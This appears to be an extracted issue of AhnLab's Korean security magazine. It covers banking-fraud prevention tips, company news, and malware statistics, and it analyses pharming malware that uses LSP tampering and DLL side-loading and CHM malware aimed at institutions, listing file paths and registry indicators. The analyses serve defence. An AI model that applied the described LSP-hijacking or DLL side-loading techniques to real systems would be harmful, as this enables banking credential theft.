PC가악성코드에감염된후정상적인인터넷뱅킹에서보안카드번호앞뒤 2자리를입력한후이체를실행시키면오류가반복되며, 이체정보는전송되지않는다. 그리고일정시간경과후범죄자가피해자의보안카드번호를입력하면범행계좌로이체된다. 다른수법은피해자의 PC가악성코드에감염된후정상적인계좌이체를마친후보안강화알림창이나타나면서보안카드번호앞뒤 2자리입력을요구하며일정시간이지나면범행계좌로이체된다. 파밍은사용자를가짜은행사이트로유도한후보안강화를위해정상적인인터넷뱅킹거래에서요구하는보안카드번호앞뒤 2자리가아닌, 이보다많거나보안카드번호모두를입력하라고요구하는경우가많아사용자가주의하면사전에피해를예방할수있다. 하지만메모리해킹은파밍보다수법이교묘해피해예방이어렵다. 정상은행사이트에서인터넷뱅킹절차인보안카드번호앞뒤 2자리를입력한후거래를완료하는시점에서금융사기가발생하기때문에별다른징후발견이어렵기때문이다. 이처럼메모리해킹이스미싱, 피싱, 파밍보다위험한이유는피해자가인지할때는이미계좌에서현금이출금된후여서손을쓰기어렵기때문이다. 아직피해사례가많지않지만추후발생가능성이클것으로예상하는만큼주의가필요하다. 백신사용과악성코드검사는필수스미싱, 피싱, 파밍은사용자가주의하면예방할수있지만, 메모리해킹은피해사실을뒤늦게인지하기때문에사전에알아둘필요가있다. 무엇보다악성코드감염으로전자금융사기가진행되는만큼악성코드의유입을차단할필요가있다. 이를위해서는백신프로그램을항상최신버전으로유지하는것이좋다. 또금전이거래되는만큼인터넷뱅킹사이트에보안프로그램이작동하는지살펴본후금융거래를하는것이좀더안전하다. 특히안전한거래를위해일회용비밀번호생성기 (OTP) 나비밀번호의복사를방지하는보안토큰사용이권장된다. 또공인인증서나보안카드, 비밀번호는 PC나이메일에저장하지말고저장돼있다면바로삭제해야한다. 앞서소개한방법은일반적인금융거래시유의사항이지만금융사기사건이계속발생하고있는만큼개인의주요자산을지키기위해서는꼭지켜야할안전한전자금융거래를위한수칙이다. 31
피해를입었다면즉시신고어안이씨와같이금전피해를당한경우라면거래은행이나금융기관의콜센터로피해사실을알리고, 공인인증서와보안카드는즉시폐기해야한다. 피해구제를받으려면전자금융거래배상책임보험에따라보험사에사고를접수하고, 보상받지못한경우피해자가별도로소송을진행해야한다. 2013년 11월 23일부터시행중인전자금융거래법개정안에따르면해킹사고가발생하면일차적인책임은은행에있지만은행이피해자의고의성이나중과실을입증하지못하면보상을받을수있다. 하지만보상을받기란쉽지않으므로, 사전예방이중요하다. < 안전한전자금융거래를위한사용자보안수칙 > OTP( 일회성비밀번호생성기 ), 보안토큰 ( 비밀정보복사방지 ) 사용 PC 이메일등에공인인증서, 보안카드사진, 비밀번호저장금지 윈도, 백신프로그램을최신버전으로유지하고실시간감시상태유지 전자금융사기예방서비스 ( 공인인증서 PC 지정등 ) 적극가입 출처불명한파일이나이메일은열람하지말고즉시삭제 영화 음란물등무료다운로드사이트이용자제 < 자료 : 사이버경찰청 > 32
AHNLAB NEWS 지능형보안위협대응필요하나도입은미진 안랩의설문조사결과, 국내기업의지능형위협대응에대한필요성과인식은높지만, 솔루션도입등실행은미흡한것으로나타났다. 안랩은한국 IDG와공동으로지난 2월 26일부터 3월 27일까지국내 IT 기업과금융, 서비스업등다양한산업군의 IT/ 비IT 담당자 444명을대상으로 지능형위협 ( 이하 APT, Advanced Persistent Threat) 대응솔루션도입 에대한설문조사를했다. 먼저, APT 대응솔루션도입검토시신종위협을탐지한이후 대응 기능의구현위치에대한질문에는 네트워크영역과 PC와같은엔드포인트영역에서각각 이라고응답한비율이절반이상 (53.7%) 을차지, 엔드포인트대응 (28.6%), 네트워크영역대응 (11%) 의응답을훨씬웃돌았다. 이는현재많은 APT 대응솔루션이네트워크영역의샌드박스 (sandbox) 기술을제공하고있지만, 실질적인 대응 을위해서는 네트워크레벨 뿐만아니라실제감염이발생하는 PC 등의 엔드포인트영역 까지 광범위한대응 의필요성을현업의실무자들이인식하고있다는것을의미한다. 또한, APT 대응솔루션의엔드포인트영역에서 대응 을위해필요한기능을묻는말에는응답자의 33.5% 가 의심파일 선차단 후악성 판정시조치 라고답해, 기업의 엔드포인트영역 에서최초감염방지를중요하게생각하는것으로파악됐다. 뒤를이어, 의심파일을내려받은시스템에대한침해사고분석 (27.4%) 과 탐지된신종악성코드에대한신속한조치 (27%) 등이비슷한비율로조사됐다. 하지만전체응답자의 68.3% 가해당기업에서 APT 대응솔루션을운영하지않고있다 고답변, 아직많은기업에서지능형위협방어실행이제대로이루어지지않은것으로나타났다. 운영중이라고답한응답자중에서는인터넷웹영역에서운영중이라는답변이 15%, 이메일영역과망분리 / 망연계구간에서운영한다는응답이 6.6%, 파일서버구간에서운영한다는답변이 3.6% 로나타났다 ( 중복응답 ). 윤상인안랩제품기획팀부장은 이번설문에서기업은 지능형위협 에빠른탐지가최선이며, 최초피해자 (patient zero) 의발생방지를중요하게생각하고있는것으로나타났다 며, 현재다양한 APT 솔루션이있으므로, 각기업의 IT 환경과도입목적에맞게 탐지와대응 이조화를이룬솔루션을선택해지능형보안위협피해를최소화해야한다 라고말했다. 안랩 V3, AV-TEST 글로벌인증획득 안랩의기업용 PC 통합보안제품인 V3 Internet Security 9.0( 이하 V3 IS 9.0) 이글로벌보안제품성능평가기관인 AV-TEST(www.avtest.org) 가 1, 2월실시한테스트에서인증기준을충족해 AV-TEST 인증을획득했다. 2015년첫평가인이번테스트는전세계주요업체의 26개보안솔루션을대상으로윈도 8.1 환경에서진행됐다. V3 IS 9.0 은진단율 (Protection), 성능 (Performance), 오진및사용편의성 (Usability) 의 3가지영역에서인증기준을충족해인증을획득했다. 특히, 진단율부문에서실제환경에가까운 리얼월드 (real-world) 테스트 에서는평균 95%, 기관이선택한대표샘플기반테스트인 프리밸런트 (prevalent) 테스트 에서는평균 100% 의진단율을기록했다. 안랩의 V3 IS 9.0 은안랩의클라우드기술인 안랩스마트디펜스 (AhnLab Smart Defense) 기반의강력한악성코드탐지기능과 행 위기반진단 과 평판기반진단 등을제공하는다차원분석플랫폼을탑재해높은악성코드대응력을제공한다. 또한, 엔진크기와검사시 PC의시스템부담을대폭감소시키고, 검사속도는빨라졌다. V3 IS 9.0 은자사의기존제품인 V3 IS 8.0 이한층업그레이드된제품이다. 한창규안랩시큐리티대응센터 (ASEC) 실장은 안랩은개인 / 기업고객이보안위협으로부터보호받고안전한사이버환경을누릴수있도록앞으로도최고의제품을제공하기위해끊임없이노력하겠다 고말했다. 한편, 안랩은 2014년 9월부터최신제품인 V3 IS 9.0으로 AV-TEST 에참가해꾸준히인증획득을이어오고있다. 또한, 모바일보안제품인 V3모바일도 AV-TEST에 2013년 1월첫테스트에참가한이후 3년연속최고성적으로인증을획득하고있다. 33
Statistics 보안통계와이슈 ASEC, 3 월악성코드통계및보안이슈발표 다시돌아온 LSP 변조, 파밍공격 안랩시큐리티대응센터 (ASEC) 는 ASEC Report Vol.63 을통해지난 2015 년 3 월의보안통계및이슈를전했다. 3 월의주요보안이 슈를살펴본다. 2월에이어 3월악성코드도 PUP가강세 ASEC이집계한바에따르면 2015년 3월한달간탐지된악성코드수는 2,131만 7,813건이다. 이는전월 2,206만 3,090건보다 74만 5,277건감소한수치다. 한편 3월에수집된악성코드샘플수는 421 만 7,293건이다. [ 그림 1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐지한악성코드의수를의미하며, 샘플수집수 는안랩이자체적으로수집한전체악성코드의샘플수를의미한다. 40,000,000 36,895,683 [ 그림 2] 는 2015년 3월한달간유포된악성코드를주요유형별로집계한결과이다. 불필요한프로그램인 PUP(Potentially Unwanted Program) 가 50.45% 로가장높은비중을차지했고, 트로이목마 (Trojan) 계열의악성코드가 28.03%, 애드웨어 (Adware) 가 6.85% 로그뒤를이었다. 0.46% 5.54% 6.85% 50.45% 30,000,000 20,000,000 10,000,000 22,063,090 21,317,813 8.67% 28.03% 6,000,000 PUP Trojan etc Adware Worm Downloader 5,000,000 4,000,000 [ 그림 2] 2015 년 3 월주요악성코드유형 3,000,000 2,000,000 2015년 3월악성코드유포지로악용된도메인은 1,563개, URL은 3만 3,588개로집계됐다. 또한, 3월의악성도메인및 URL 차단건수는총 535만 4,893건이다. 악성도메인및 URL 차단건수는 PC 1,000,000 3,549,667 3,549,667 4,217,293 등시스템이악성코드유포지로악용된웹사이트의접속을차단한수이다. 01 월 02 월 03 월 탐지건수 샘플수집수 [ 그림 1] 악성코드추이 (2015 년 1 월 ~ 2015 년 3 월 ) 34
9,000,000 8,104,699 8,000,000 7,000,000 6,000,000 5,000,000 4,860,868 5,354,893 4,000,000 [ 그림 5] Winsock 2 & Winsock 2 Transport SPI 구조 40,000 33,588 Winsock(Windows Socket API) 은윈도운영체제내에서인터넷응용프로그램의입출력요청을처리하는인터페이스이다. 웹브라우저 30,000 20,000 24,254 19,790 와같은응용프로그램의명령을받아 Winsock 2 DLL 을거쳐최종적으로 Base Provider 와통신한다. 10,000 1,917 1,594 1,563 0 01 월 02 월 03 월 악성도메인 /URL 차단건수 악성코드유포도메인수 악성코드유포 URL 수 [ 그림 3] 악성코드유포도메인 /URL 탐지및차단건수 (2015 년 1 월 ~ 2015 년 3 월 ) 2015 년 3 월한달간탐지된모바일악성코드는 24 만 7,243 건으로 집계됐다. 250,000 200,000 221,188 150,000 108,607 100,000 50,000 0 01월 02월 [ 그림 4] 모바일악성코드추이 (2015년 1월 ~ 2015년 3월 ) 247,243 03 월 [ 그림 6] LSP(Layered Service Provider) 구조 이러한통신과정의 LSP는모든데이터를여과없이통과하기때문에송수신되는데이터를모두감시할수있다. LSP를함부로삭제할경우네트워크가정상적으로동작하지않으며레지스트리에등록되어설치되므로 LSP 변조여부를인지하기어렵다. 이번에발견된악성코드는기존의공격방법인 LSP 변조 와 VPN 터널링 기법을사용했다. 악성코드에감염되면 [ 표 1] 과같이파일을생성한다. [ 생성파일 ] C:\WINDOWs\system32\v2BSXerv.dll C:\WINDOWs\system32\twlsp.dll [ 표 1] 생성되는파일경로 생성된파일은 [ 표 2] 와같이레지스트리에등록되어시스템시작시자동으로실행된다. 다시돌아온 LSP 변조, 파밍공격오래전 온라인게임핵, 파밍 악성코드에사용된공격방법이최근다시발견되었다. 이번에발견된공격방법은 LSP(Layered Service Provider) 변조를이용한방식과정상파일을악용한방식이다. 두가지방식에대해알아보자. LSP 변조방법관련악성코드를알아보기에앞서 LSP에대해알아보면 [ 그림 5] 와같다. [ 레지스트리경로 ] HKLM\SYSTEM\ControlSet001\Services\BSXerv\DisplayName BS Server HKLM\SYSTEM\ControlSet001\Services\BSXerv\ImagePath %SystemRoot%\system32\svchost -k BSXerv HKLM\SYSTEM\ControlSet001\Services\BSXerv\Parameters\ServiceDll C:\WINDOWS\system32\v2BSXerv.dll [ 표 2] 레지스트리등록 35
이후시스템의 LSP를변조한다. 악성코드는시스템에저장된 LSP 프로토콜정보목록을모두삭제한후 twlsp.dll 파일을추가한다 ([ 그림 7]). 이후기존에저장된 LSP 프로토콜정보를복원시킨다. [ 변조된 LSP 경로 ] HKLM\SYSTEM\ControlSet001\Services\WinSock2\Parameters\ Protocol_Catalog9\Catalog_Entries\[ 숫자 ]\PackedCatalogItem 43 3A 5C 57 49 4E 44 4F 57 53 5c 73 79 73 74 65 6d 33 32 5c 74 77 6c 73 70 2e ( 생략 ) [ 표 3] 변조된 LSP 경로 도하면감염된악성코드에의해파밍사이트로연결된다. 정상파일 (UTIL) 을악용한파밍공격주말을이용해다수의국내사이트가파밍악성코드유포에악용된정황이확인되었다. 사이트대다수는최종적으로같은악성파일을내려받도록조작되어있었다. 악성코드유포방법은 카이홍갓모드 (Caihong, God Mode) 를이용한악성코드유포방식과유사하다. 공격자는취약한사이트에아이프레임 (iframe) 을삽입하고경유지를거쳐최종적으로파밍악성코드를내려받도록유도한다. [ 그림 7] 추가된 twlsp.dll 파일 악성코드는사용자가감염여부를인지하지못하도록자가삭제된다. 그리고 svchost.exe를통해실행된 v2bsxerv.dll 파일에의해 VPN 정보를수신하여연결을시도한다. [ 그림 11] 악성코드유포과정 [ 그림 8] 실행중인 v2bsxerv.dll 파일 삽입된스크립트들은분석이어렵게난독화되어있다. 일반사용자들은스크립트동작이눈에보이지않기때문에악성코드에감염된사실을인지하기어렵다. 이번에발견된파밍악성코드는악성코드를실행시키는과정에서정상유틸리티파일을이용했다. [ 그림 9] VPN 정보수신 [ 그림 12] 정상 / 악성 DLL 비교 [ 그림 10] VPN 정보수신 VPN 에연결되면악성코드는감염된시스템에서주요포털과은행사 이트에연결을시도하는것을감시한다. 사용자가사이트에접속을시 정상파일이악성코드실행에이용된것은이번이처음은아니다. 2014년에도국내에서잘알려진프로그램의정상파일도악성코드실행에사용되었으며이번에발견된악성코드는마우스로볼륨을조절하는유틸리티인 볼류마우스 (Volumouse Utility) 를통해실행한다. 36
이는정상파일이 DLL을로드하는과정에서 DLL을검증하지않는설계상의문제점을이용한것이다. Volumouse.exe는위치기반으로 vlmshlp.dll을로드하여실행하는데, DLL을로드하는과정에서로드될파일의사실여부를검증하지않는다. 따라서로드될 DLL과이름만같다면설계시의도한파일이아니어도문제없이실행된다. [ 그림 15] 실행화면 [ 그림 13] 악성 vlmshlp.dll 로드 위와같이처음 CHM 파일을클릭하면바로악성파일이실행되는이유는 index.htm에있는오브젝트 (object) 태그를이용하여악성코드를로드하기때문이다 ([ 그림 16]). [ 그림 14] 와같이로드된악성 vlmshlp.dll은 svchost.exe를실행시키고메모리변조를통해악성행위를하는프로세스로둔갑시킨다. [ 그림 16] 오브젝트태그를이용하여악성파일 (wuacted.exe) 실행 [ 그림 14] 변조된 svchost.exe 실행 또한, 메모리영역의데이터만변조했기때문에파일자체는정상파일이지만실제행위는악성 vlmshlp.dll이변조한행위를한다. 일반사용자는 vlmshlp.dll이악성인지정상인지를판단하기어렵다. 최종적으로변조된 svcshost.exe는공인인증서유출, DNS 변조, 맥주소유출등을통해파밍사이트로접속을유도하여사용자들의금융정보를탈취한다. 정상사이트를침해하여악성코드를유포하는방법은접속하는사용자모두가공격대상이다. 이러한공격들은특정응용프로그램과운영체제의취약점을이용하여사용자모르게악성코드를감염시킨다. 뿐만아니라감염사실을인지하기어려우므로보안업데이트나백신을사용하지않을경우무방비상태로악성코드에노출될수있다. 따라서이를대비하기위해보안업데이트와백신을항상최신버전으로유지할것을권장한다. 해당악성코드는여러스레드 (thread) 와이벤트로동작한다. 각스레드는 C&C와의송수신, 악성코드다운로드, 파일을실행한다. 특히하드코딩된값들로 HTTP 헤더 (header) 를랜덤하게구성하는코드가확인되었지만, 현재 C&C(www.wi****m.com, 17*.**.***. *53:3680) 가정상으로동작하지않아자세한확인은이루어지지않았다. [ 표 4] 와같이랜덤으로구성되는 HTTP 헤더의 URL은존재하지않는주소로확인된다. [ 표 4] 랜덤으로구성되는각헤더요소들 이러한형태, 행위와 C&C는 [ 그림 17] 과같이과거수집된몇몇 CHM 악성코드에서도확인된바있다. V3 제품군에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > Trojan/Win32.Kryptik (2015.03.04.00) Trojan/Win32.Injector(2015.03.09.03) Trojan/Win32.Banki(2015.03.10.04) JS/Redirect(2015.03.10.02) JS/Exploitkit(2015.03.09.02) 주요기관노리는 CHM 악성코드 기관을대상으로한악성 CHM(Microsoft Compiled HTML Help) 파일이지속적으로발견되고있다. 특히과거부터발견된몇몇파일들이서로비슷한특징을가지고있어그연관성을확인해볼필요가있다. [ 그림 15] 와같이악성파일을실행하면 Microsoft 도움말 (CHM) 파일과청첩장 PDF 파일임을확인할수있다. [ 그림 17] 파일별바이너리문자열비교 ( 왼쪽부터 2012년 5월, 2013년 4월, 2015년 3월, 2015년 3월 ) 안랩은청첩장, 이력서를비롯하여 3.20 전용백신, 국방표준종합정보시스템공지 등으로위장한 CHM을소개한바있다. [ 표 5] 와같이각파일의특징을간단히비교해보았다. 37
조금더넓게본다면이런가능성이하나로묶여특정그룹이나대상이관련악성코드를생성하고있는것은아닌지의심해볼수있다. [ 표 5] 파일비교 [ 표 5] 와같이악성파일로드방식이나 C&C 도메인의유사성, 바이너리문자열그리고랜덤 HTTP 헤더조합코드의존재여부를비교했을때파일간에는유사성이있는것으로추정된다. 적당한시간간격으로꾸준히접수되고있고최근까지도관련테스트파일이수집된것으로보아연관성을의심해볼만하다. 이처럼 CHM을이용한해킹시도는계속되고있다. 보안, 국방, 외교등중요도가높거나공격대상또한중요도가높은대상일가능성이높으며, 해당악성코드가실행되면 C&C 서버에서원격명령을그대로실행할수있어감염시 2차피해가우려되므로사용자의각별한주의가필요하다. V3 제품군에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > Dropper/Rctl (2015.03.17.00) Trojan/Win32.RCtl (2015.03.20.05) 38
발행인 : 권치중발행처 : 주식회사안랩경기도성남시분당구판교역로 220 T. 031-722-8000 F. 031-722-8901 편집인 : 안랩콘텐츠기획팀디자인 : 안랩 UX디자인팀 2015 AhnLab, Inc. All rights reserved. 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다.
http://www.ahnlab.com http://blog.ahnlab.com http://twitter.com/ahnlab_man 경기도성남시분당구판교역로 220 T. 031-722-8000 F. 031-722-8901 2015 AhnLab, Inc. All rights reserved.